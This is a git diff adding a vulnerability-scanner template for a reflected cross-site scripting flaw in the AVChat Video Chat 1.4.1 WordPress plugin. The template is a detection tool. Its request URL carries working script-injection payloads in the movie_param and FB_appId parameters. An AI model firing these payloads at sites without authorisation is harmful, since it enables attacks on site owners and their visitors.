diff --git a/vulnerabilities/wordpress/wp-avchat-3-xss.yaml b/vulnerabilities/wordpress/wp-avchat-3-xss.yaml new file mode 100644 index 0000000000..6a1d3c4ce9 --- /dev/null +++ b/vulnerabilities/wordpress/wp-avchat-3-xss.yaml @@ -0,0 +1,37 @@ +id: wp-avchat-3-xss + +info: + name: AVChat Video Chat 1.4.1 - index_popup.php Multiple Parameters Reflected XSS + author: DhiyaneshDK + severity: medium + description: | + The Community Lite Video Chat WordPress plugin was affected by an index_popup.php Multiple Parameters Reflected XSS security vulnerability. + reference: + - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/ + - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59 + metadata: + verified: true + tags: wordpress,wp-plugin,xss,unauth + + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - 'FB_appId">"' + - 'swfobject.embedSWF(""' + part: body + + - type: word + words: + - 'text/html' + part: header + + - type: status + status: + - 200